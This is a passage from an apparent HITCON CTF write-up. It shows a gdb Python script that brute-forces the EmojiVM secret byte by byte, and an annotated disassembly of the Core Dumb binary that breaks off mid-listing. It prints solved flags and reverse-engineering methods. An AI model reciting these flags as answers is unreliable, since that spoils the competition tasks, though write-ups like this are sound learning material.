    WritePNG(<span class="hljs-string">"result.png"</span>,png);
}</code></pre><p class="img-container"><img src="https://i.imgur.com/Ukh9L7o.png" alt=""></p>
<p><code>hitcon{why_not_just_use_the_printer}</code></p>
<h3 id="emojivm-1"><a class="header-link" href="#emojivm-1"></a>EmojiVM</h3>
<p>To solve this chal, I didn&#39;t fully understand the emoji byte code in <code>chal.evm</code></p>
<p>I found that there are some <code>==</code> instructions. I guessed that it will do something on our input secret ,then compare with the correct secret.</p>
<p>After using <code>gdb</code> on <code>emojivm</code>. I noticed that the comparison is done byte by byte. It indicate that I can brute force the correct secret byte by byte.</p>
<p>So I write the following gdb python script to get the correct input.</p>
<pre class="hljs"><code>import gdb
import <span class="hljs-built_in">string</span>
import codecs
s = str(codecs.decode(<span class="hljs-string">'8e63cd124b5815175122d904512c1915862cd14c842e200618'</span>, <span class="hljs-string">'hex'</span>))[<span class="hljs-number">2</span>:-<span class="hljs-number">1</span>]
<span class="hljs-keyword">print</span>(s)
a_bytes = bytes.fromhex(<span class="hljs-string">'8e63cd124b5815175122d904512c1915862cd14c842e200618'</span>)
<span class="hljs-keyword">print</span>(a_bytes)
flag=<span class="hljs-string">"h999-BB00-0000-0000-0000"</span>
gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">"b *0x0000555555559283"</span>)
<span class="hljs-keyword">pre</span>=<span class="hljs-string">""</span>
been=[]
<span class="hljs-keyword">for</span> i in <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(<span class="hljs-keyword">pre</span>),<span class="hljs-built_in">len</span>(a_bytes)):
  <span class="hljs-keyword">print</span>(a_bytes[i])
  <span class="hljs-keyword">if</span> flag[i]==<span class="hljs-string">"-"</span>:
    <span class="hljs-keyword">pre</span>+=<span class="hljs-string">"-"</span>
    <span class="hljs-keyword">continue</span>
  <span class="hljs-keyword">for</span> <span class="hljs-keyword">j</span> in <span class="hljs-built_in">string</span>.printable:
    <span class="hljs-keyword">f</span>=<span class="hljs-keyword">open</span>(<span class="hljs-string">"haha"</span>,<span class="hljs-string">"w"</span>)
    <span class="hljs-keyword">f</span>.<span class="hljs-keyword">write</span>(<span class="hljs-keyword">pre</span>+<span class="hljs-keyword">j</span>+<span class="hljs-string">"h999-BB00-0000-0000-f14g"</span>[<span class="hljs-built_in">len</span>(<span class="hljs-keyword">pre</span>)+<span class="hljs-number">1</span>:]+<span class="hljs-string">"\n"</span>)
    <span class="hljs-keyword">f</span>.<span class="hljs-keyword">close</span>()  
    t=a_bytes[i]
    <span class="hljs-keyword">if</span> t&gt;=<span class="hljs-number">0</span>x80:
      gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">"cond 1 *0x7fffffffdbd8 == 0xffffffffffffff"</span>+hex(t)[<span class="hljs-number">2</span>:])
    <span class="hljs-keyword">else</span>:
      gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">"cond 1 *0x7fffffffdbd8 == "</span>+hex(t))
      <span class="hljs-keyword">print</span>(<span class="hljs-string">"cond 1 *0x7fffffffdba8 == "</span>+hex(t))
    gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">'r chal.evm &lt; haha'</span>)
    <span class="hljs-keyword">o</span>=gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">'p *0x7fffffffdbd0'</span>, to_string=True)
    <span class="hljs-keyword">o</span>=str(<span class="hljs-keyword">o</span>).<span class="hljs-keyword">split</span>()[<span class="hljs-number">2</span>]
    <span class="hljs-keyword">while</span> <span class="hljs-keyword">o</span> in been:
      gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">'c'</span>)
      <span class="hljs-keyword">o</span>=gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">'p *0x7fffffffdbd0'</span>, to_string=True)
      <span class="hljs-keyword">o</span>=str(<span class="hljs-keyword">o</span>).<span class="hljs-keyword">split</span>()[<span class="hljs-number">2</span>]
    <span class="hljs-keyword">o</span>=gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">'p *0x7fffffffdbe0'</span>, to_string=True)
    <span class="hljs-keyword">o</span>=str(<span class="hljs-keyword">o</span>).<span class="hljs-keyword">split</span>()[<span class="hljs-number">2</span>]
    o2=gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">'p *0x7fffffffdbd8'</span>, to_string=True)
    o2=str(o2).<span class="hljs-keyword">split</span>()[<span class="hljs-number">2</span>]
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">o</span>==o2:
      <span class="hljs-keyword">pre</span>+=<span class="hljs-keyword">j</span>
      <span class="hljs-keyword">open</span>(<span class="hljs-string">"flag"</span>,<span class="hljs-string">"w"</span>).<span class="hljs-keyword">write</span>(<span class="hljs-keyword">pre</span>+<span class="hljs-string">"\n"</span>)
      <span class="hljs-keyword">o</span>=gdb.<span class="hljs-keyword">execute</span>(<span class="hljs-string">'p *0x7fffffffdbd0'</span>, to_string=True)
      <span class="hljs-keyword">o</span>=str(<span class="hljs-keyword">o</span>).<span class="hljs-keyword">split</span>()[<span class="hljs-number">2</span>]
      been.<span class="hljs-keyword">append</span>(<span class="hljs-keyword">o</span>)
      <span class="hljs-keyword">break</span>
</code></pre><p>The corrct secret is <code>plis-g1v3-me33-th3e-f14g</code>, and the flag is<code>hitcon{R3vers3_Da_3moj1}</code></p>
<h3 id="core-dumb"><a class="header-link" href="#core-dumb"></a>Core Dumb</h3>
<p><code>gdb -c core-3c5a47af728e9968fd7a6bb41fbf573cd52677bc</code> can help you analyze the coredump file.</p>
<p><code>bt</code> can help you figure out the base address of <code>text segment</code></p>
<pre class="hljs"><code>gdb-peda$ bt
<span class="hljs-string">#0</span>  <span class="hljs-number">0</span>x00007fffffffd980 <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#1</span>  <span class="hljs-number">0</span>x0000555555554c5c <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#2</span>  <span class="hljs-number">0</span>x0000555555756ac0 <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#3</span>  <span class="hljs-number">0</span>x0000001100000000 <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#4</span>  <span class="hljs-number">0</span>x00000000001e7620 <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#5</span>  <span class="hljs-number">0</span>x00007fffffffd980 <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#6</span>  <span class="hljs-number">0</span>x61d1502acc982937 <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#7</span>  <span class="hljs-number">0</span>x748161623a26a1a5 <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#8</span>  <span class="hljs-number">0</span>x00000000000000a1 <span class="hljs-keyword">in</span> ?? ()
<span class="hljs-string">#9</span>  <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-keyword">in</span> ?? ()
</code></pre><p>It tells us that the base address is <code>0x0000555555554000</code></p>
<p>So I dump the memory and found the entry point is <code>0x780 + 0x0000555555554000</code> by using <code>readelf</code></p>
<p>Maybe you can use <code>IDA pro</code> to analyze the code. But I only use <code>gdb</code>, and directly read the assembly with the help of <code>x/i</code></p>
<p>The main function is at <code>0x555555554c7e</code></p>
<pre class="hljs"><code>main:
   <span class="hljs-number">0x555555554c7e</span>:    push   rbp
   <span class="hljs-number">0x555555554c7f</span>:    mov    rbp,rsp
   <span class="hljs-number">0x555555554c82</span>:    sub    rsp,<span class="hljs-number">0x150</span>
   <span class="hljs-number">0x555555554c89</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x144</span>],edi
   <span class="hljs-number">0x555555554c8f</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x150</span>],rsi
   <span class="hljs-number">0x555555554c96</span>:    mov    rax,QWORD PTR fs:<span class="hljs-number">0x28</span>
   <span class="hljs-number">0x555555554c9f</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x8</span>],rax
   <span class="hljs-number">0x555555554ca3</span>:    xor    eax,eax
   <span class="hljs-number">0x555555554ca5</span>:    
    mov    rax,QWORD PTR [rip+<span class="hljs-number">0x201e84</span>]        <span class="hljs-comment"># 0x555555756b30</span>
   <span class="hljs-number">0x555555554cac</span>:    mov    ecx,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554cb1</span>:    mov    edx,<span class="hljs-number">0x2</span>
   <span class="hljs-number">0x555555554cb6</span>:    mov    esi,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554cbb</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555554cbe</span>:    call   <span class="hljs-number">0x555555554750</span> <span class="hljs-comment"># maybe setbuf()</span>
   <span class="hljs-number">0x555555554cc3</span>:    
    mov    rax,QWORD PTR [rip+<span class="hljs-number">0x201e56</span>]        <span class="hljs-comment"># 0x555555756b20</span>
   <span class="hljs-number">0x555555554cca</span>:    mov    ecx,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ccf</span>:    mov    edx,<span class="hljs-number">0x2</span>
   <span class="hljs-number">0x555555554cd4</span>:    mov    esi,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554cd9</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555554cdc</span>:    call   <span class="hljs-number">0x555555554750</span> <span class="hljs-comment"># maybe setbuf()</span>
   <span class="hljs-number">0x555555554ce1</span>:    
    mov    rax,QWORD PTR [rip+<span class="hljs-number">0x201e58</span>]        <span class="hljs-comment"># 0x555555756b40</span>
   <span class="hljs-number">0x555555554ce8</span>:    mov    ecx,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ced</span>:    mov    edx,<span class="hljs-number">0x2</span>
   <span class="hljs-number">0x555555554cf2</span>:    mov    esi,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554cf7</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555554cfa</span>:    call   <span class="hljs-number">0x555555554750</span> <span class="hljs-comment"># maybe setbuf()</span>
   <span class="hljs-number">0x555555554cff</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x140</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554d09</span>:    lea    rax,[rip+<span class="hljs-number">0x201db0</span>]        <span class="hljs-comment"># 0x555555756ac0</span>
   <span class="hljs-number">0x555555554d10</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x130</span>],rax
   <span class="hljs-number">0x555555554d17</span>:    lea    rax,[rip+<span class="hljs-number">0x201302</span>]        <span class="hljs-comment"># 0x555555756020 encoded check1 function </span>
   <span class="hljs-number">0x555555554d1e</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x120</span>],rax
   <span class="hljs-number">0x555555554d25</span>:    lea    rax,[rip+<span class="hljs-number">0x201414</span>]        <span class="hljs-comment"># 0x555555756140 encoded check2 function</span>
   <span class="hljs-number">0x555555554d2c</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x110</span>],rax
   <span class="hljs-number">0x555555554d33</span>:    lea    rax,[rip+<span class="hljs-number">0x2015c6</span>]        <span class="hljs-comment"># 0x555555756300 encoded check3 function</span>
   <span class="hljs-number">0x555555554d3a</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x100</span>],rax
   <span class="hljs-number">0x555555554d41</span>:    lea    rax,[rip+<span class="hljs-number">0x2018b8</span>]        <span class="hljs-comment"># 0x555555756600 encoded check4 function</span>
   <span class="hljs-number">0x555555554d48</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xf0</span>],rax
   <span class="hljs-number">0x555555554d4f</span>:    lea    rax,[rip+<span class="hljs-number">0x201caa</span>]        <span class="hljs-comment"># 0x555555756a00 encoded check5 function</span>
   <span class="hljs-number">0x555555554d56</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xe0</span>],rax
   <span class="hljs-number">0x555555554d5d</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x140</span>],<span class="hljs-number">0x1</span>
   <span class="hljs-number">0x555555554d67</span>:    jmp    <span class="hljs-number">0x555555554ddc</span>
   <span class="hljs-number">0x555555554d69</span>:    mov    eax,DWORD PTR [rbp<span class="hljs-number">-0x140</span>]
   <span class="hljs-number">0x555555554d6f</span>:    sub    eax,<span class="hljs-number">0x1</span>
   <span class="hljs-number">0x555555554d72</span>:    cdqe   
   <span class="hljs-number">0x555555554d74</span>:    lea    rdx,[rax*<span class="hljs-number">4</span>+<span class="hljs-number">0x0</span>]
   <span class="hljs-number">0x555555554d7c</span>:    lea    rax,[rip+<span class="hljs-number">0x201d5d</span>]        <span class="hljs-comment"># 0x555555756ae0</span>
   <span class="hljs-number">0x555555554d83</span>:    mov    eax,DWORD PTR [rdx+rax*<span class="hljs-number">1</span>]
   <span class="hljs-number">0x555555554d86</span>:    mov    edx,DWORD PTR [rbp<span class="hljs-number">-0x140</span>]
   <span class="hljs-number">0x555555554d8c</span>:    movsxd rdx,edx
   <span class="hljs-number">0x555555554d8f</span>:    shl    rdx,<span class="hljs-number">0x4</span>
   <span class="hljs-number">0x555555554d93</span>:    add    rdx,rbp
   <span class="hljs-number">0x555555554d96</span>:    sub    rdx,<span class="hljs-number">0x128</span>
   <span class="hljs-number">0x555555554d9d</span>:    mov    DWORD PTR [rdx],eax
   <span class="hljs-number">0x555555554d9f</span>:    mov    eax,DWORD PTR [rbp<span class="hljs-number">-0x140</span>]
   <span class="hljs-number">0x555555554da5</span>:    sub    eax,<span class="hljs-number">0x1</span>
   <span class="hljs-number">0x555555554da8</span>:    cdqe   
   <span class="hljs-number">0x555555554daa</span>:    lea    rdx,[rax*<span class="hljs-number">4</span>+<span class="hljs-number">0x0</span>]
   <span class="hljs-number">0x555555554db2</span>:    lea    rax,[rip+<span class="hljs-number">0x201d47</span>]        <span class="hljs-comment"># 0x555555756b00</span>
   <span class="hljs-number">0x555555554db9</span>:    mov    eax,DWORD PTR [rdx+rax*<span class="hljs-number">1</span>]
   <span class="hljs-number">0x555555554dbc</span>:    mov    edx,DWORD PTR [rbp<span class="hljs-number">-0x140</span>]
   <span class="hljs-number">0x555555554dc2</span>:    movsxd rdx,edx
   <span class="hljs-number">0x555555554dc5</span>:    shl    rdx,<span class="hljs-number">0x4</span>
   <span class="hljs-number">0x555555554dc9</span>:    add    rdx,rbp
   <span class="hljs-number">0x555555554dcc</span>:    sub    rdx,<span class="hljs-number">0x124</span>
   <span class="hljs-number">0x555555554dd3</span>:    mov    DWORD PTR [rdx],eax
   <span class="hljs-number">0x555555554dd5</span>:    add    DWORD PTR [rbp<span class="hljs-number">-0x140</span>],<span class="hljs-number">0x1</span>
   <span class="hljs-number">0x555555554ddc</span>:    cmp    DWORD PTR [rbp<span class="hljs-number">-0x140</span>],<span class="hljs-number">0x5</span>
   <span class="hljs-number">0x555555554de3</span>:    jle    <span class="hljs-number">0x555555554d69</span>
   <span class="hljs-number">0x555555554de5</span>:    
    mov    eax,DWORD PTR [rip+<span class="hljs-number">0x201d09</span>]        <span class="hljs-comment"># 0x555555756af4</span>
   <span class="hljs-number">0x555555554deb</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x128</span>],eax
   <span class="hljs-number">0x555555554df1</span>:    
    mov    eax,DWORD PTR [rip+<span class="hljs-number">0x201d1d</span>]        <span class="hljs-comment"># 0x555555756b14</span>
   <span class="hljs-number">0x555555554df7</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x124</span>],eax
   <span class="hljs-number">0x555555554dfd</span>:    mov    rdx,QWORD PTR [rbp<span class="hljs-number">-0x130</span>]
   <span class="hljs-number">0x555555554e04</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0x128</span>]
   <span class="hljs-number">0x555555554e0b</span>:    mov    rdi,rdx
   <span class="hljs-number">0x555555554e0e</span>:    mov    rsi,rax
   <span class="hljs-number">0x555555554e11</span>:    call   <span class="hljs-number">0x555555554bd8</span> <span class="hljs-comment"># useless test function</span>
   <span class="hljs-number">0x555555554e16</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x13c</span>],eax
   <span class="hljs-number">0x555555554e1c</span>:    cmp    DWORD PTR [rbp<span class="hljs-number">-0x13c</span>],<span class="hljs-number">0x1337</span>
   <span class="hljs-number">0x555555554e26</span>:    je     <span class="hljs-number">0x555555554e3e</span>
   <span class="hljs-number">0x555555554e28</span>:    lea    rdi,[rip+<span class="hljs-number">0x3ec</span>]        <span class="hljs-comment"># 0x55555555521b</span>
   <span class="hljs-number">0x555555554e2f</span>:    call   <span class="hljs-number">0x555555554710</span> <span class="hljs-comment"># puts "Test failed !"</span>
   <span class="hljs-number">0x555555554e34</span>:    mov    eax,<span class="hljs-number">0x1</span>
   <span class="hljs-number">0x555555554e39</span>:    jmp    <span class="hljs-number">0x555555555174</span>
   <span class="hljs-number">0x555555554e3e</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xd0</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554e49</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xc8</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554e54</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xc0</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554e5f</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xb8</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554e6a</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xb0</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554e75</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xa8</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554e80</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0xa0</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554e8b</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x98</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554e95</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x90</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ea0</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x88</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554eab</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x80</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554eb3</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x78</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ebb</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x70</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ec3</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x68</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ecb</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x60</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ed3</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x58</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554eda</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x50</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ee2</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x48</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554eea</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x40</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554ef2</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x38</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554efa</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x30</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554f02</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x28</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554f0a</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x20</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554f12</span>:    mov    DWORD PTR [rbp<span class="hljs-number">-0x18</span>],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554f19</span>:    lea    rax,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x555555554f20</span>:    mov    QWORD PTR [rbp<span class="hljs-number">-0x138</span>],rax
   <span class="hljs-number">0x555555554f27</span>:    lea    rdi,[rip+<span class="hljs-number">0x2fb</span>]        <span class="hljs-comment"># 0x555555555229</span>
   <span class="hljs-number">0x555555554f2e</span>:    mov    eax,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554f33</span>:    call   <span class="hljs-number">0x555555554730</span> <span class="hljs-comment"># printf("Please enter the flag: ")</span>
   <span class="hljs-number">0x555555554f38</span>:    lea    rax,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x555555554f3f</span>:    mov    edx,<span class="hljs-number">0x37</span>
   <span class="hljs-number">0x555555554f44</span>:    mov    rsi,rax
   <span class="hljs-number">0x555555554f47</span>:    mov    edi,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554f4c</span>:    call   <span class="hljs-number">0x555555554740</span> <span class="hljs-comment"># supposed read(0,rbp-0xd0,0x37)</span>
   <span class="hljs-number">0x555555554f51</span>:    jmp    <span class="hljs-number">0x555555554f83</span>
   <span class="hljs-number">0x555555554f53</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0x138</span>]
   <span class="hljs-number">0x555555554f5a</span>:    movzx  eax,BYTE PTR [rax]
   <span class="hljs-number">0x555555554f5d</span>:    cmp    al,<span class="hljs-number">0xa</span>
   <span class="hljs-number">0x555555554f5f</span>:    je     <span class="hljs-number">0x555555554f6f</span>
   <span class="hljs-number">0x555555554f61</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0x138</span>]
   <span class="hljs-number">0x555555554f68</span>:    movzx  eax,BYTE PTR [rax]
   <span class="hljs-number">0x555555554f6b</span>:    cmp    al,<span class="hljs-number">0xd</span>
   <span class="hljs-number">0x555555554f6d</span>:    jne    <span class="hljs-number">0x555555554f7b</span>
   <span class="hljs-number">0x555555554f6f</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0x138</span>]
   <span class="hljs-number">0x555555554f76</span>:    mov    BYTE PTR [rax],<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554f79</span>:    jmp    <span class="hljs-number">0x555555554f91</span>
   <span class="hljs-number">0x555555554f7b</span>:    add    QWORD PTR [rbp<span class="hljs-number">-0x138</span>],<span class="hljs-number">0x1</span>
   <span class="hljs-number">0x555555554f83</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0x138</span>]
   <span class="hljs-number">0x555555554f8a</span>:    movzx  eax,BYTE PTR [rax]
   <span class="hljs-number">0x555555554f8d</span>:    test   al,al
   <span class="hljs-number">0x555555554f8f</span>:    jne    <span class="hljs-number">0x555555554f53</span>
   <span class="hljs-number">0x555555554f91</span>:    lea    rax,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x555555554f98</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555554f9b</span>:    call   <span class="hljs-number">0x55555555488a</span> <span class="hljs-comment"># strlen(rbp-0xd0)</span>
   <span class="hljs-number">0x555555554fa0</span>:    cmp    eax,<span class="hljs-number">0x34</span>
   <span class="hljs-number">0x555555554fa3</span>:    je     <span class="hljs-number">0x555555554faf</span> <span class="hljs-comment"># strlen(rbp-0xd0) = 0x34</span>
   <span class="hljs-number">0x555555554fa5</span>:    mov    eax,<span class="hljs-number">0x0</span>
   <span class="hljs-number">0x555555554faa</span>:    call   <span class="hljs-number">0x555555554949</span>
   <span class="hljs-number">0x555555554faf</span>:    lea    rcx,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x555555554fb6</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x555555554fbd</span>:    mov    edx,<span class="hljs-number">0xa</span>
   <span class="hljs-number">0x555555554fc2</span>:    mov    rsi,rcx
   <span class="hljs-number">0x555555554fc5</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555554fc8</span>:    call   <span class="hljs-number">0x5555555548bc</span> <span class="hljs-comment"># supposed strncpy(rbp-0x90,rbp-0xd0,0xa)</span>
   <span class="hljs-number">0x555555554fcd</span>:    lea    rdx,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x555555554fd4</span>:    mov    rsi,QWORD PTR [rbp<span class="hljs-number">-0x120</span>] <span class="hljs-comment"># encoded check1 function </span>
   <span class="hljs-number">0x555555554fdb</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0x118</span>] <span class="hljs-comment"># xor key1 </span>
   <span class="hljs-number">0x555555554fe2</span>:    mov    ecx,<span class="hljs-number">0xa</span>
   <span class="hljs-number">0x555555554fe7</span>:    mov    rdi,rsi
   <span class="hljs-number">0x555555554fea</span>:    mov    rsi,rax
   <span class="hljs-number">0x555555554fed</span>:    call   <span class="hljs-number">0x555555554a38</span> <span class="hljs-comment"># decode check function and check the flag</span>
   <span class="hljs-number">0x555555554ff2</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x555555554ff9</span>:    mov    esi,<span class="hljs-number">0x37</span>
   <span class="hljs-number">0x555555554ffe</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555555001</span>:    call   <span class="hljs-number">0x55555555490f</span> <span class="hljs-comment"># clear buf rbp-0x90</span>
   <span class="hljs-number">0x555555555006</span>:    lea    rax,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x55555555500d</span>:    lea    rcx,[rax+<span class="hljs-number">0xa</span>]
   <span class="hljs-number">0x555555555011</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x555555555018</span>:    mov    edx,<span class="hljs-number">0x8</span>
   <span class="hljs-number">0x55555555501d</span>:    mov    rsi,rcx
   <span class="hljs-number">0x555555555020</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555555023</span>:    call   <span class="hljs-number">0x5555555548bc</span> <span class="hljs-comment"># supposed strncpy(rbp-0x90,rbp-0xd0,0x8)</span>
   <span class="hljs-number">0x555555555028</span>:    lea    rdx,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x55555555502f</span>:    mov    rcx,QWORD PTR [rbp<span class="hljs-number">-0x110</span>] <span class="hljs-comment"># encoded check2 function</span>
   <span class="hljs-number">0x555555555036</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0x108</span>] <span class="hljs-comment"># xor key2</span>
   <span class="hljs-number">0x55555555503d</span>:    mov    rdi,rcx
   <span class="hljs-number">0x555555555040</span>:    mov    rsi,rax
   <span class="hljs-number">0x555555555043</span>:    call   <span class="hljs-number">0x555555554b0c</span> <span class="hljs-comment"># decode check function and check the flag</span>
   <span class="hljs-number">0x555555555048</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x55555555504f</span>:    mov    esi,<span class="hljs-number">0x37</span>
   <span class="hljs-number">0x555555555054</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555555057</span>:    call   <span class="hljs-number">0x55555555490f</span>
   <span class="hljs-number">0x55555555505c</span>:    lea    rax,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x555555555063</span>:    lea    rcx,[rax+<span class="hljs-number">0x12</span>]
   <span class="hljs-number">0x555555555067</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x55555555506e</span>:    mov    edx,<span class="hljs-number">0x12</span>
   <span class="hljs-number">0x555555555073</span>:    mov    rsi,rcx
   <span class="hljs-number">0x555555555076</span>:    mov    rdi,rax
   <span class="hljs-number">0x555555555079</span>:    call   <span class="hljs-number">0x5555555548bc</span> <span class="hljs-comment"># supposed strncpy(rbp-0x90,rbp-0xd0,0x12)</span>
   <span class="hljs-number">0x55555555507e</span>:    lea    rdx,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x555555555085</span>:    mov    rsi,QWORD PTR [rbp<span class="hljs-number">-0x100</span>] <span class="hljs-comment"># encoded check3 function</span>
   <span class="hljs-number">0x55555555508c</span>:    mov    rax,QWORD PTR [rbp<span class="hljs-number">-0xf8</span>] <span class="hljs-comment"># xor key3</span>
   <span class="hljs-number">0x555555555093</span>:    mov    ecx,<span class="hljs-number">0x12</span>
   <span class="hljs-number">0x555555555098</span>:    mov    rdi,rsi
   <span class="hljs-number">0x55555555509b</span>:    mov    rsi,rax
   <span class="hljs-number">0x55555555509e</span>:    call   <span class="hljs-number">0x555555554a38</span> <span class="hljs-comment"># decode check function and check the flag</span>
   <span class="hljs-number">0x5555555550a3</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x5555555550aa</span>:    mov    esi,<span class="hljs-number">0x37</span>
   <span class="hljs-number">0x5555555550af</span>:    mov    rdi,rax
   <span class="hljs-number">0x5555555550b2</span>:    call   <span class="hljs-number">0x55555555490f</span>
   <span class="hljs-number">0x5555555550b7</span>:    lea    rax,[rbp<span class="hljs-number">-0xd0</span>]
   <span class="hljs-number">0x5555555550be</span>:    lea    rcx,[rax+<span class="hljs-number">0x24</span>]
   <span class="hljs-number">0x5555555550c2</span>:    lea    rax,[rbp<span class="hljs-number">-0x90</span>]
   <span class="hljs-number">0x5555555550c9</span>:    mov    edx,<span class="hljs-number">0xc</span>
   <span class="hljs-number">0x5555555550ce</span>:    mov    rsi,rcx
   <span class="hljs-number">0x5555555550d1</span>:    mov    rdi,rax
